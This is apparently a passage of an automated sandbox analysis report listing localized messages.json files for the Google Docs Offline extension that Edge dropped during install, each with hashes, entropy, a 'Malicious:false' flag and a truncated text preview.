                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3264
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                            MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                            SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                            SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                            SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3235
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                            MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                            SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                            SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                            SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3122
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                            MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                            SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                            SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                            SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1895
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                            MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                            SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                            SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                            SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1042
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                            MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                            SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                            SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                            SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2535
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                            MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                            SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                            SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                            SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1028
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                            MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                            SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                            SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                            SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):994
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                            MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                            SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                            SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                            SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2091
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                            MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                            SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                            SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                            SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2778
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                            MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                            SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                            SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                            SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                            MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                            SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                            SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                            SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):936
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                            MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                            SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                            SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                            SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
